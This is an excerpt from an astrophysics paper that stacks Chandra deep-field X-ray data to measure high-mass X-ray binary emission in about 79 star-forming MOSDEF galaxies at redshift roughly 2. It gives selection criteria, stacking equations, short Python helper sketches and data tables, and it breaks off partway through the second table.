\section{\textit{Chandra} Extragalactic Surveys}
\label{sec:chandra}
The \textit{Chandra X-ray Observatory} has performed several deep extragalactic surveys. For this study, we use the \textit{Chandra} ACIS imaging in the \textit{Chandra} AEGIS-X Deep, Deep Field North (CDF-N), and Deep Field South (CDF-S) fields. These fields have the deepest X-ray exposures, permitting the most complete identification and removal of X-ray AGN. The exposure depths reached in these fields are 7~Ms in CDF-S, 2~Ms in CDF-N, and 800~ks in AEGIS-XD (\citealt{alexander03}; \citealt{nandra15}; \citealt{luo17}).
The corresponding flux limits (over $>50$\% of the survey area) in the 0.5--2~keV band reached by these surveys are $5\times10^{-17}$, $1.2\times10^{-16}$, and $2\times10^{-16}$~erg~cm$^{-2}$~s$^{-1}$, respectively, which correspond to 2--10~keV rest-frame X-ray luminosities of $1.2\times10^{42}$, $3.5\times10^{42}$, and $5.8\times10^{42}$~erg~s$^{-1}$ at $z\sim2$ assuming a power-law spectrum with a photon index of $\Gamma=2.0$. \par
\subsection{\textit{Chandra} data processing}
The \textit{Chandra} data from the AEGIS-XD and CDF-N fields were processed as described in \citet{laird09}, \citet{rangel13}, \citet{nandra15}, and \citet{aird15}, and we made use of the publicly available \textit{Chandra} mosaic images and exposure maps of the CDF-S field produced as described in \citet{luo17}. The data were processed using the CIAO analysis software, v4.1.2 for the AEGIS-XD and CDF-N data and v4.8 for the CDF-S data. The data processing procedures applied to all three datasets are very similar and are briefly summarized below with full details provided in \citet{nandra15} and \citet{luo17}. \par
Each observation was cleaned and calibrated using standard CIAO algorithms. For each observation, the \textit{Chandra} wavelet source detection algorithm \texttt{wavdetect} was run on the 0.5--7~keV band image with a detection threshold of $10^{-6}$. The astrometry of individual observations was improved by using the CIAO tool \texttt{reproject\_aspect} to minimize the offsets between \texttt{wavdetect} sources and counterparts in the Canada-France-Hawaii Telescope Legacy survey (CFHTLS) $i$-band catalog \citep{gwyn12} for AEGIS-XD, the $r$-band Hawaii HDFN catalog \citep{capak04} for CDF-N, and the Taiwan ECDFS Near-Infrared Survey (TENIS) K$s$-band catalog \citep{hsieh12} for CDF-S.
\subsection{Chandra data products and catalogs}
For each individual observation, event files, images, exposure maps, and PSF maps of the 90\% encircled energy fraction (EEF) as calculated by the MARX simulator were created for the 0.5--7, 0.5--2, and 2--7~keV bands. The exposure maps provide the exposure multiplied by the effective collecting area at each pixel location; they are weighted for a power-law spectrum with $\Gamma=1.4$, the photon index of the cosmic X-ray background (\citealt{gruber99}; \citealt{ajello08}; \citealt{cappelluti17}).\footnote{Adopting a different value of $\Gamma$ in the range from 1.0 to 2.0 would change the exposure map values by $<10\%$.} The event files, images, exposure maps, and PSF maps for each field were merged together into the mosaics used in our X-ray stacking analysis (see \S\ref{sec:stacking}). \par
We compared the astrometric frame of these final mosaics to the astrometry of the 3D-HST catalogs from which the MOSDEF galaxy positions are determined. For each X-ray detected counterpart of a MOSDEF galaxy with $>40$ net counts in the $0.5-7$ keV band, we calculated the $(x,y)$ positional offset between its coordinates from the 3D-HST catalog and its centroid coordinates measured using the \texttt{gcntrd} IDL program. In the AEGIS, GOODS-S, and GOODS-N fields, there are 9, 6, and 23 such counterparts to MOSDEF galaxies. For each field, we then determined the average $x$ and $y$ offset, and found them to be $<1$ pixel in all cases. We apply these positional shifts to ensure the best match between the \textit{Chandra} mosaics and the astrometric reference frame of MOSDEF galaxies. However, we note that because the X-ray aperture regions used in our stacking analysis are at least 4 pixels in diameter, these small positional shifts do not significantly impact the derived X-ray properties of our stacks. \par
In order to study the XRB emission of non-AGN MOSDEF galaxies, it is important to reduce not only contamination from MOSDEF AGN but also the contribution from nearby detected X-ray sources that are not associated with MOSDEF galaxies. X-ray source catalogs for the CDF-S, CDF-N, and AEGIS-XD surveys are provided by \citet{luo17}, \citet{alexander03}, and \citet{nandra15}, respectively. We use these catalogs to remove the contribution of detected \textit{Chandra} sources to our X-ray stacks as detailed in \S\ref{sec:stacking}. \par
\section{Galaxy Sample Selection}
\label{sec:sample}
Since our goal is to study HMXB emission as a function of $Z$ and SFR, we apply several selection criteria to select galaxies with reliably measured properties and to minimize contamination from other X-ray sources. \par
Therefore, we excluded from our sample any MOSDEF galaxy that is identified as an AGN using the X-ray, IR, or optical criteria described in \S\ref{sec:agn}.
The other sources that can contribute significantly to a galaxy's hard X-ray emission are low-mass X-ray binaries (LMXBs), whose X-ray emission is correlated with the stellar mass ($M_*$) of a galaxy (\citealt{gilfanov04}; \citealt{colbert04}). Thus, the X-ray contribution of HMXBs relative to LMXBs is maximized in galaxies with high specific SFR (sSFR=SFR/$M_*$). Studies of local galaxies find that galaxies with sSFR$>10^{-10}$~yr$^{-1}$ are HMXB-dominated \citep{lehmer10}, which is true of all galaxies in our MOSDEF sample. However, the sSFR value at which galaxies transition from being LMXB-dominated to HMXB-dominated may increase with redshift (\citealt{lehmer16}). Considering that this value for $z\sim2$ galaxies remains poorly constrained, we study how restricting our sample to different sSFR ranges affects our results. Our MOSDEF galaxies span a sSFR range of $10^{-9.6}-10^{-8.1}$ yr$^{-1}$ with a median sSFR of $10^{-8.8}$ yr$^{-1}$. \par
We required that galaxies have an O/H measurement or upper/lower limit based on the O3N2 indicator in order to facilitate comparison to local studies of the $Z$ dependence of HMXBs (\citealt{douna15}; \citealt{brorby16}). In addition, we restricted our sample to galaxies with both H$\alpha$ and SED-derived SFRs.
We further limited our galaxy sample to $M_*\geq10^{9.5} M_{\odot}$, because \citet{shivaei15} demonstrated that MOSDEF samples may be incomplete at lower $M_*$ due to a bias against young objects with small Balmer and 4000 $\mathrm{\AA}$ breaks. Furthermore, the MOSDEF survey may not be complete in H$\alpha$ SFRs for $M_*<10^{9.5} M_{\odot}$, because we would expect that such low-mass galaxies scattering below the $M_*$-SFR relation \citep{sanders18} would fall below the $3\sigma$ H$\beta$ detection limit.
\par
As mentioned in \S\ref{sec:chandra}, even though the MOSDEF survey covers all the CANDELS fields, we only included galaxies from the GOODS-S \citep{giavalisco04}, GOODS-N \citep{giavalisco04}, and AEGIS \citep{davis07} fields; the \textit{Chandra} survey of the COSMOS field \citep{scoville07} is much shallower \citep{civano16}, and in the UKIDSS-UDS field \citep{lawrence07} only 34 galaxies were observed as a part of MOSDEF, just a few of which meet our selection criteria. Furthermore, only galaxies in the $z\sim1.5$ and $z\sim2.3$ redshift intervals are used. The galaxy sample at $z\sim3.4$ is too small to produce significant X-ray stacked detections and, at these high redshifts, the H$\alpha$ and [N{\small II}] emission lines move out of the near-infrared band, requiring different diagnostics to screen optical AGN and to measure $Z$ and SFR. \par
Finally, we imposed two additional restrictions in order to optimize the \textit{Chandra} stacking procedure described in \S\ref{sec:stacking}. These criteria are based on the size of the PSF at the galaxy position and proximity to other sources.\par
\begin{figure*}
\centering
\includegraphics[width=1.0\linewidth]{SFRvsM_Ha.ps}
\vspace{0.5in}
\caption{H$\alpha$ SFRs of MOSDEF galaxies versus $M_*$ derived from SED fitting. The gray squares show all MOSDEF galaxies with H$\alpha$-derived SFRs and no AGN signatures. The 79 galaxies used in our analysis are shown by symbols colored according to $Z$. The circle, lower half circle, and upper half circle symbols represent galaxies at 1.37 $\leq z \leq$ 1.70 with O/H measurements, upper limits, or lower limits, respectively. The diamond, downward triangle, and upward triangle symbols represent galaxies at 2.09 $\leq z \leq$ 2.61 with O/H measurements, upper limits, or lower limits, respectively. The median 1$\sigma$ uncertainty in SFR and $M_*$ measurements is shown in the upper left corner. The MOSDEF galaxies are well-distributed along the main sequence of star-forming galaxies shown by the gray contours, which are based on the distribution of galaxies with 1.37 $\leq z \leq$ 2.61 from the COSMOS field \citep{laigle16}. The vertical dashed line represents our $M_*$ selection threshold, while the diagonal dashed line represents our division of the sample into high and low sSFR galaxies (sSFR$=10^{-8.8}$ yr$^{-1}$).}
\label{fig:sfrmass}
\end{figure*}
Only 79 MOSDEF galaxies meet all our selection criteria. Figure \ref{fig:sfrmass} displays the H$\alpha$ SFR versus stellar mass for the galaxies in our sample in points colored by the oxygen abundance and outlined in blue or black for $z\sim1.5$ and $z\sim2.3$, respectively. The gray squares in this figure represent all MOSDEF galaxies with $1.4<z<2.7$ and H$\alpha$-derived SFRs, and the gray contours are based on the SED-derived SFRs and $M_*$ from a much larger sample of $\sim$160,000 galaxies in the COSMOS field with photometric redshifts in the same $z$ range \citep{laigle16}. As can be seen, even though our sample is small, it is representative of star-forming galaxies at $z\sim2$. \citet{sanders18} found evidence that a $M_*$-SFR-$Z$ relation exists in MOSDEF galaxies at $z\sim2.3$, a hint of which can be observed in Figure \ref{fig:sfrmass} as galaxies with higher SFR at fixed $M_*$ have lower $Z$. As shown in Figure \ref{fig:redshift}, 20 galaxies are at $z\sim1.5$ and 59 are at $z\sim2.3$. The $Z$ distribution of our sample is shown in Figure \ref{fig:metaldist}, with 12+log(O/H) measurements, 3$\sigma$ upper, and 3$\sigma$ lower limits indicated in different colors. The $Z$ distribution is strongly peaked at 12+log(O/H) = 8.3--8.4.
\begin{figure}
\centering
\includegraphics[width=1.0\linewidth]{zhistogram.ps}
\caption{The redshift distribution of the 79 galaxies used for our study. The distribution is bimodal because MOSDEF targets were selected in specific redshift windows ($1.37\leq z\leq1.70$ and $2.09\leq z\leq2.61$) for which rest-frame optical strong emission lines fall within atmospheric transmission windows. There are more galaxies with $z\sim2.3$ than $z\sim1.5$ as a result of the MOSDEF survey's targeting strategy \citep{kriek15}.}
\label{fig:redshift}
\end{figure}
\begin{figure}
\centering
\includegraphics[width=1.0\linewidth]{Zmetal_histogram.ps}
\caption{The distribution of $Z$ of the galaxies in our sample, as traced by nebular O/H based on the O3N2 indicator. O/H measurements (calculated when all relevant emission lines are significantly detected) are shown in purple, while O/H upper and lower limits are shown in blue and red, respectively.}
\label{fig:metaldist}
\end{figure}
\section{X-ray Stacking Analysis}
\label{sec:stacking}
The typical X-ray luminosities of normal (non-AGN) star-forming galaxies are $L_X<10^{42}$~erg~s$^{-1}$ in the rest-frame 2--10~keV band.\footnote{Low luminosity AGN and/or obscured AGN can also exhibit $L_X<10^{42}$~erg~s$^{-1}$. We discuss possible contamination from such AGN in \S\ref{sec:systematics}.} Since these luminosities fall below the sensitivity limits of the \textit{Chandra} extragalactic surveys at $z\sim2$, studying the X-ray emission of these galaxies requires stacking the X-ray data. We developed an X-ray stacking technique that is similar to that used by other studies (e.g. \citealt{basu13a}; \citealt{rangel13}; \citealt{mezcua16}; \citealt{fornasini18}). In order to achieve the highest sensitivity, we performed the stacking primarily using the 0.5--2~keV band because \textit{Chandra} has the highest effective area and best angular resolution at soft X-ray energies. However, we also stacked the data in the 2--7~keV band in order to measure the hardness ratios for our stacks. \par
\subsection{X-ray photometry for individual sources}
For each of the galaxies in our sample, we defined source and background aperture regions. Each source aperture was defined as a circular region centered on the galaxy position from the 3D-HST catalog with a radius equal to the 90\% EEF PSF radius ($r_{90}$). The median $r_{90}$ of MOSDEF objects is $2.4^{\prime\prime}$, and their angular sizes are small enough that their galaxy-wide X-ray emission is consistent with a point source. Each background aperture was defined as an annulus with an inner radius equal to 10$^{\prime\prime}$ and an outer radius equal to 30$^{\prime\prime}$. \par
As mentioned in \S\ref{sec:sample}, we made some refinements to our galaxy sample based on X-ray criteria.
In order to prevent contamination to our source or background count estimates from unassociated X-ray sources, we masked out from the images and exposure maps circular regions with a radius of 2$r_{90}$ at the positions of any X-ray detected sources in the CDF-S, CDF-N, and AEGIS-XD source catalogs (\citealt{alexander03}; \citealt{luo17}; \citealt{nandra15}), regardless of what energy band the source was detected in. We removed from our sample any galaxy at a distance $<2r_{90}$ of an X-ray detected source. We also excluded any galaxies at a distance $<r_{90}$ from another galaxy in the 3D-HST catalog with $H_{\mathrm{AB}}$ (F160W) magnitude $<24.0$, which is the magnitude limit approximately corresponding to $M_*=10^{9.5} M_{\odot}$ at $z\sim2.3$. These sources were excluded to avoid contamination from neighboring galaxies with X-ray emission below the sensitivity threshold of the \textit{Chandra} surveys but potentially of luminosity comparable to or greater than that of our MOSDEF galaxies. We also removed four galaxies located in an area of diffuse X-ray emission in the CDF-N field. Finally, to optimize the signal-to-noise ratio, we excluded galaxies located far off-axis in the \textit{Chandra} observations as the \textit{Chandra} PSF increases with off-axis angle; we find that the significance of our stacks is maximized by excluding sources with $r_{90}>3.5^{\prime\prime}$. \par
We extracted the counts ($C_{\mathrm{src}}$, $C_{\mathrm{bkg}}$), effective exposure time ($t_{\mathrm{src}}$, $t_{\mathrm{bkg}}$), and aperture areas in units of pixels$^2$ ($A_{\mathrm{src}}$, $A_{\mathrm{bkg}}$) for both the source and background regions for each galaxy using the CIAO tool \texttt{dmextract}. The effective exposure accounts for variations across the field of view due to the telescope optics, CCD gaps, and bad pixels. The background region counts were extracted from the annular background regions, from which any X-ray detected sources as well as all MOSDEF galaxies were masked out. Our measurements of the aperture areas account for any fraction of the area that was masked out. \par
For each source, we calculated the net background-subtracted counts and a conversion factor to translate the net counts into the rest-frame X-ray luminosity. The net source counts ($C_{\mathrm{net}}$) are calculated as:
\begin{equation}
C_{\mathrm{net}} = C_{\mathrm{src}} - C_{\mathrm{bkg}}\times\frac{t_{\mathrm{src}}A_{\mathrm{src}}}{t_{\mathrm{bkg}}A_{\mathrm{bkg}}}
\end{equation}
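The background subtraction above is a one-line helper (our own sketch), with the background scaled by the ratio of exposure times area between the two apertures:

```python
def net_counts(c_src, c_bkg, t_src, t_bkg, a_src, a_bkg):
    """Background-subtracted source counts: the background counts are
    rescaled by the ratio of (effective exposure x aperture area)
    between the source and background regions."""
    return c_src - c_bkg * (t_src * a_src) / (t_bkg * a_bkg)
```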
Converting the net counts in the 0.5--2~keV band into rest-frame 2--10~keV luminosities requires assuming a spectral model to calculate the mean energy per photon ($E_{\mathrm{avg}}$) and the $k$-correction ($k_{\mathrm{corr}}$). We assume an unobscured power-law spectrum with $\Gamma=2.0$ to facilitate comparison with the local $L_{\mathrm{X}}$-SFR-$Z$ relation measured by \citet{brorby16}. In Section \ref{sec:systematics}, we discuss the validity and uncertainty associated with this assumption. For each source, we calculate the conversion factor, $\omega$, between net counts and X-ray luminosity, as given by:
\begin{equation}
\begin{split}
L_{\mathrm{X}} & = C_{\mathrm{net}}/\omega \\
\omega & = (t_{\mathrm{src}}\mathrm{ECF})/(4\pi D_{\mathrm{L}}^{2} E_{\mathrm{avg}} k_{\mathrm{corr}})
\end{split}
\end{equation}
where $D_{\mathrm{L}}$ is the luminosity distance and ECF $=0.9$ since our aperture regions are based on 90\% PSF radius. \par
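The conversion factor $\omega$ might be computed as sketched below. The treatment of units (the exposure map folding in effective area, so $t_{\mathrm{src}}$ carries s~cm$^2$) and the approximate mean photon energy for a $\Gamma=2$ power law are our own assumptions for illustration; note that for $\Gamma=2$ the band $k$-correction is independent of redshift:

```python
import numpy as np

KEV_TO_ERG = 1.602e-9  # 1 keV in erg

def kcorr_gamma2(e_obs=(0.5, 2.0), e_rest=(2.0, 10.0)):
    """k-correction for a Gamma = 2 power law: band energy flux scales
    as ln(E2/E1), so the factor does not depend on redshift."""
    return np.log(e_rest[1] / e_rest[0]) / np.log(e_obs[1] / e_obs[0])

def count_to_lum_factor(t_src, d_lum_cm, e_avg_kev, k_corr, ecf=0.9):
    """Conversion factor omega such that L_X = C_net / omega.

    t_src     : effective exposure from the exposure map (s cm^2, since
                the map folds in the effective collecting area)
    d_lum_cm  : luminosity distance in cm
    e_avg_kev : mean photon energy in the observed band (~0.92 keV for
                a Gamma = 2 power law over 0.5-2 keV)
    ecf       : enclosed-count fraction of the aperture (0.9 for r90)
    """
    e_avg = e_avg_kev * KEV_TO_ERG
    return (t_src * ecf) / (4.0 * np.pi * d_lum_cm ** 2 * e_avg * k_corr)
```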
\subsection{Stacked X-ray luminosities}
For a given galaxy stack, we summed the net counts and the expected number of background counts from individual source apertures. The average X-ray luminosity ($\langle L_{\mathrm{X}} \rangle$) of a stack of $N$ galaxies is calculated as the total net counts divided by the sum of the conversion factors:
\begin{equation}
\langle L_{\mathrm{X}} \rangle = \frac{1}{N}\sum_i^N \frac{C_{\mathrm{net,}i}}{\omega_{i}} \approx \frac{\sum_i^N C_{\mathrm{net,}i}}{\sum_i^N \omega_{i}}
\end{equation}
This approximation is appropriate when the galaxies in a given stack have similar $L_X$. We expect the range of $L_X$ for galaxies in a given $Z$ bin to primarily be set by the range of SFR, and therefore to span at most 2 orders of magnitude. For such a range of $L_X$, we estimate that the approximation we use to measure $\langle L_{\mathrm{X}} \rangle$ should be accurate to 0.1 dex. The conversion factor $\omega$ associated with each galaxy provides a relative weighting for how much each galaxy contributes to the measured X-ray emission. Since our goal is to study the relationship between $L_{\mathrm{X}}$ and different galaxy properties (i.e. SFR, $Z$, $z$, $M_*$, sSFR), for each galaxy stack we also calculate the weighted average of each galaxy property, applying the $\omega$ factors used to calculate the X-ray luminosity. We estimate that our measurement of $\langle L_{\mathrm{X}} \rangle/\langle $SFR$ \rangle$ should approximate $\langle L_{\mathrm{X}}/$SFR$ \rangle$ with an accuracy of 0.05 dex based on the scatter of 0.3-0.4 dex observed in the local $L_X$-SFR-$Z$ relation \citep{brorby16}. \par
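The stacked average and the $\omega$-weighted galaxy properties amount to simple ratio-of-sums estimators (a minimal sketch, not the stacking pipeline itself):

```python
import numpy as np

def stacked_lx(c_net, omega):
    """Average L_X of a stack: total net counts divided by the summed
    count-to-luminosity conversion factors."""
    c_net, omega = np.asarray(c_net, float), np.asarray(omega, float)
    return c_net.sum() / omega.sum()

def weighted_property(q, omega):
    """omega-weighted average of a galaxy property (SFR, M*, z, ...),
    so each galaxy contributes in proportion to its weight in the
    stacked X-ray signal."""
    q, omega = np.asarray(q, float), np.asarray(omega, float)
    return (q * omega).sum() / omega.sum()
```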
We computed two sources of error on each stacked signal. The first is Poisson noise associated with the background, which we used to establish the significance of the signal in each stack. We calculated the Poisson probability that a random fluctuation of the estimated background counts could result in a number of counts within the source regions greater than or equal to the total stacked counts (source plus background). \par
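The Poisson significance test described above can be sketched with a survival-function call (our own helper; the detection threshold itself is set elsewhere in the analysis):

```python
from scipy.stats import poisson

def stack_false_prob(total_counts, expected_bkg):
    """Probability that a Poisson fluctuation of the expected background
    alone yields at least the observed total (source + background)
    counts, i.e. P(X >= total) with X ~ Poisson(expected_bkg)."""
    return poisson.sf(total_counts - 1, expected_bkg)
```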
Table \ref{tab:prop} provides information about the properties of galaxies in our stacks, including the weighted average redshift, $M_*$, and SFR, as well as the median stacked O/H. The X-ray properties of our stacks, including the signal significance, net counts, and mean $L_{\mathrm{X}}$, are presented in Table \ref{tab:xray}.
We tested that our stacking procedure does not result in an unusual number of spurious detections by stacking the \textit{Chandra} data at random sky positions rather than galaxy positions. We apply the same X-ray selection criteria to the random positions as to our galaxy sample.
We make 500 mock stacks for each of the 10 real stacks described in Table \ref{tab:prop}; each mock stack includes the same number of individual positions per \textit{Chandra} survey field as its corresponding real stack. For each mock stack, we calculate the probability that the total stacked counts could be due to a random fluctuation of the estimated background. The resulting probability distributions of the mock stacks are consistent with expectations for random noise (e.g. $1\%$ of mock stacks have a 1\% probability of being due to random noise). Thus, the detection probabilities of our real stacks are reliable.
\par
The statistical uncertainties associated with the measured X-ray luminosities are calculated using a bootstrapping method, which measures how the contribution of individual sources affects the average stacked signal. To determine the bootstrapping errors, we randomly resampled the galaxies in each stack 1000 times and repeated our stacking analysis. The number of galaxies in a given stack is conserved during the resampling, leading some values to be duplicated while others are eliminated in a particular iteration. From the resulting distribution of stacked X-ray luminosities, we measure 1$\sigma$ confidence intervals for stacked signals exceeding our detection threshold.
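The bootstrap described above might be implemented as follows (an illustrative sketch; the 1$\sigma$ interval is taken from the 15.87th and 84.13th percentiles of the resampled distribution, an assumption consistent with standard practice):

```python
import numpy as np

def bootstrap_lx_ci(c_net, omega, n_boot=1000, seed=0):
    """Bootstrap 1-sigma confidence interval on the stacked <L_X>:
    resample galaxies with replacement, keeping the stack size fixed,
    and recompute the ratio-of-sums estimator each time."""
    rng = np.random.default_rng(seed)
    c_net, omega = np.asarray(c_net, float), np.asarray(omega, float)
    n = len(c_net)
    samples = np.empty(n_boot)
    for k in range(n_boot):
        idx = rng.integers(0, n, n)  # resample with replacement
        samples[k] = c_net[idx].sum() / omega[idx].sum()
    return np.percentile(samples, [15.87, 84.13])
```

Resampling with replacement means some galaxies are duplicated and others dropped in each iteration, so the spread of the resampled stacks measures how sensitive the average is to individual sources.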
\par
As done in \citet{lehmer16}, the uncertainties associated with the weighted average galaxy properties ($\langle Q_{\mathrm{phys}} \rangle$) are also calculated by a bootstrapping technique. Each galaxy value is perturbed according to its error distribution and the weighted average is recalculated. The calculation of these perturbed average values ($\langle Q^{\mathrm{pert}}_{\mathrm{phys,}k} \rangle$) is performed 1000 times, and the 1$\sigma$ uncertainty on the weighted average is calculated according to the following equation:
\begin{equation}
\sigma_{\langle Q_{\mathrm{phys}} \rangle} = \Big[\frac{1}{N_{\mathrm{boot}}}\sum_{k=1}^{N_{\mathrm{boot}}}(\langle Q^{\mathrm{pert}}_{\mathrm{phys,}k} \rangle - \langle Q_{\mathrm{phys}} \rangle )^2 \Big]^{1/2}
\end{equation}
\par
The weighted average galaxy properties for each stack discussed in \S\ref{sec:results} are provided in Table \ref{tab:prop}, while the stacked X-ray properties are listed in Table \ref{tab:xray}.
\begin{table*}
\begin{minipage}{\textwidth}
\centering
\footnotesize
\caption{Average Galaxy Properties of Stacks}
\begin{tabular}{cccccccclcc} \hline \hline
\T \multirow{2}{*}{Stack ID} & \multicolumn{4}{c}{\# Galaxies} & \multirow{2}{*}{$\langle z \rangle$} & log$\langle M_* \rangle$ & \multirow{2}{*}{12+log(O/H)} & \hspace{0.3cm}SFR & $\langle \mathrm{SFR}\rangle$ & log$\langle \mathrm{sSFR} \rangle$ \\ \cline{2-5}
& All & AEGIS & CDF-N & CDF-S & & ($M_{\odot}$) & & Indicator & ($M_{\odot}$ yr$^{-1}$) & (yr$^{-1}$) \\
\B (a) & (b) & (c) & (d) & (e) & (f) & (g) & (h) & (i) & (j) & (k) \\
\hline
\multicolumn{5}{l}{\textbf{All sSFR}} \\
\hline
\T \B 1 & 79 & 53 & 22 & 3 & 1.92 & $10.121^{+0.002}_{-0.001}$ & $8.31\pm0.01$ & H$\alpha$, corr & $22.9^{+0.7}_{-0.3}$ & $-8.738^{+0.009}_{-0.004}$\\
\hline
\multicolumn{5}{l}{\textbf{All sSFR: redshift binning}} \\
\hline
\T 2 & 20 & 13 & 7 & 0 & 1.51 & $10.053^{+0.002}_{-0.001}$ & $8.32\pm0.02$ & H$\alpha$, corr & $16.6^{+0.5}_{-0.2}$ & $-8.856^{+0.010}_{-0.004}$\\
\B 3 & 59 & 41 & 15 & 3 & 2.26 & $10.172\pm0.001$ & $8.31\pm0.01$ & H$\alpha$, corr & $28.3^{+0.9}_{-0.4}$ & $-8.658^{+0.009}_{-0.004}$\\
\hline
\multicolumn{5}{l}{\textbf{All sSFR: metallicity binning}} \\
\hline
\T 4 & 30 & 19 & 8 & 3 & 2.05 & $9.971^{+0.002}_{-0.001}$ & $8.23^{+0.01}_{-0.02}$ & H$\alpha$, corr & $22.6^{+0.7}_{-0.3}$ & $-8.606^{+0.006}_{-0.003}$ \\
5 & 23 & 19 & 4 & 0 & 1.82 & $10.110^{+0.002}_{-0.001}$ & $8.35\pm0.01$ & H$\alpha$, corr & $27.3^{+0.8}_{-0.3}$ & $-8.711^{+0.013}_{-0.005}$ \\
\B 6 & 19 & 13 & 6 & 0 & 1.78 & $10.337\pm0.002$ & $8.52\pm0.02$ & H$\alpha$, corr & $25.4^{+0.9}_{-0.3}$ & $-8.983^{+0.014}_{-0.005}$ \\
\hline
\multicolumn{5}{l}{\textbf{Restricted sSFR: metallicity binning}} \\
\hline
\multicolumn{5}{l}{\textbf{\hspace{0.1cm}$-9.3<$ log(sSFR)$_{\mathrm{H}\alpha, \mathrm{corr}}$$<-8.4$}} \\ \cline{1-4}
7a & 24 & 15 & 7 & 2 & 2.04 & $10.001\pm0.001$ & $8.24^{+0.01}_{-0.02}$ & H$\alpha$, corr & $20.6^{+0.6}_{-0.2}$ & $-8.705^{+0.005}_{-0.002}$ \\
8a & 21 & 17 & 4 & 0 & 1.83 & $10.110\pm0.001$ & $8.35\pm0.01$ & H$\alpha$, corr & $23.4^{+0.7}_{-0.3}$ & $-8.791^{+0.013}_{-0.005}$ \\
9a & 15 & 11 & 4 & 0 & 1.86 & $10.408^{+0.002}_{-0.001}$ & $8.45^{+0.02}_{-0.03}$ & H$\alpha$, corr & $36.2^{+1.3}_{-0.5}$ & $-8.849^{+0.014}_{-0.006}$ \\
\cline{1-4}
\multicolumn{5}{l}{\textbf{\T \hspace{0.1cm}$-9.2<$ log(sSFR)$_{\mathrm{H}\alpha}$ $<-8.4$}} \\ \cline{1-4}
7b & 18 & 9 & 7 & 1 & 2.01 & $10.019\pm0.001$ & $8.22\pm0.02$ & H$\alpha$ & $26.0^{+0.7}_{-0.3}$ & $-8.650^{+0.011}_{-0.004}$ \\
8b & 20 & 17 & 3 & 0 & 1.94 & $10.177\pm0.001$ & $8.38\pm0.01$ & H$\alpha$ & $28.9^{+0.9}_{-0.4}$ & $-8.720^{+0.014}_{-0.005}$ \\
9b & 14 & 10 & 4 & 0 & 1.89 & $10.343^{+0.002}_{-0.001}$ & $8.45^{+0.02}_{-0.03}$ & H$\alpha$ & $36.0^{+1.3}_{-0.5}$ & $-8.827^{+0.014}_{-0.006}$ \\
\cline{1-4}
\multicolumn{5}{l}{\textbf{\T \hspace{0.1cm}$-9.05<$ log(sSFR)$_{\mathrm{SED}}$ $<-8.5$}} \\ \cline{1-4}
7c & 22 & 13 & 8 & 1 & 2.05 & $9.980\pm0.001$ & $8.25^{+0.01}_{-0.02}$ & SED & $19.4^{+0.2}_{-0.1}$ & $-8.663^{+0.005}_{-0.003}$ \\
8c & 22 & 18 & 4 & 0 & 1.81 & $10.113^{+0.002}_{-0.001}$ & $8.35\pm0.01$ & SED & $22.0\pm0.2$ & $-8.801^{+0.005}_{-0.003}$\\
\B 9c & 15 & 10 & 5 & 0 & 1.75 & $10.192^{+0.002}_{-0.001}$ & $8.50\pm0.02$ & SED & $25.3^{+0.3}_{-0.2}$ & $-8.851^{+0.005}_{-0.003}$ \\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: log(sSFR) $>-8.8$}} \\
\hline
\T \B 10 & 37 & 26 & 6 & 3 & 2.03 & $10.117^{+0.002}_{-0.001}$ & $8.30^{+0.01}_{-0.02}$ & H$\alpha$, corr & $37.5^{+1.2}_{-0.5}$ & $-8.508^{+0.009}_{-0.004}$ \\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: redshift binning}} \\
\hline
\T 11 & 8 & 7 & 1 & 0 & 1.49 & $10.140^{+0.003}_{-0.001}$ & $8.31^{+0.01}_{-0.03}$ & H$\alpha$, corr & $39.0^{+1.2}_{-0.5}$ & $-8.510^{+0.011}_{-0.005}$ \\
\B 12 & 29 & 21 & 5 & 3 & 2.27 & $10.106\pm0.001$ & $8.29^{+0.01}_{-0.02}$ & H$\alpha$, corr & $36.9^{+1.2}_{-0.5}$ & $-8.508^{+0.008}_{-0.004}$\\
\hline
\multicolumn{5}{l}{\textbf{High sSFR: metallicity binning}} \\
\hline
\T 13 & 19 & 12 & 4 & 3 & 2.12 & $10.012^{+0.002}_{-0.001}$ & $8.23\pm0.02$ & H$\alpha$, corr & $30.2^{+0.9}_{-0.4}$ & $-8.493^{+0.006}_{-0.003}$ \\
\B 14 & 17 & 15 & 2 & 0 & 1.87 & $10.264^{+0.002}_{-0.001}$ & $8.40\pm0.01$ & H$\alpha$, corr & $51.6^{+1.7}_{-0.7}$ & $-8.530^{+0.014}_{-0.006}$ \\
\hline
\hline \hline
\multicolumn{11}{p{7.0in}}{\T Notes:
(h) X-ray weighted, median oxygen abundance of the galaxy stack based on O3N2 indicator \citep{pettini04}.
(i) SED SFR listed assumes $Z=0.02$, Calzetti extinction curve, and constant SF history. The H$\alpha$ indicator assumed $Z=0.02$ and the Cardelli extinction curve. For the H$\alpha$, corr indicator, the conversion factor for galaxies with 12+log(O/H)$<8.3$ assumes $Z=0.004$ and the Cardelli extinction curve.
} \\
\end{tabular}
\label{tab:prop}
\end{minipage}
\end{table*}
\begin{table*}
\begin{minipage}{\textwidth}
\centering
\footnotesize
\caption{Stacked X-ray Properties}
\begin{tabular}{cccccclc} \hline \hline
\T \multirow{2}{*}{Stack ID} & Total exposure & Effective exposure & \multirow{2}{*}{$P_{\mathrm{random}}$} & \multirow{2}{*}{Net counts} & $\langle L_{\mathrm{X}} \rangle$ & SFR & \multirow{2}{*}{log$\frac{\langle L_{\mathrm{X}}\rangle}{\langle \mathrm{SFR}\rangle}$}\\
 & (Ms) & (Ms cm$^{2}$) & & & ($10^{40}$ erg s$^{-1}$) & Indicator & \\
(a) & (b) & (c) & (d) & (e) & (f) & (g) & (h)\\
\hline
\multicolumn{5}{l}{\textbf{All sSFR}} \\
\hline
\T 1 & 105.1 & 25779 & 1.5e-8 & $96\pm19$ & $19.9^{+3.1}_{-4.4}$ & H$\alpha$, corr & $39.94^{+0.06}_{-0.11}$\\
\hline
\multicolumn{5}{l}{\textbf{All sSFR: redshift binning}} \\
\hline
\T 2 & 23.8 & 6204 & 3.7e-4 & $26^{+10}_{-9}$ & $11.8^{+2.2}_{-4.3}$ & H$\alpha$, corr & $39.85^{+0.08}_{-0.19}$\\
\B 3 & 81.3 & 19575 & 3.5e-6 & $70\pm17$ & $26.8^{+5.6}_{-7.1}$ & H$\alpha$, corr & $39.98^{+0.08}_{-0.13}$ \\
\hline
\multicolumn{5}{l}{\textbf{All sSFR: metallicity binning}} \\
\hline
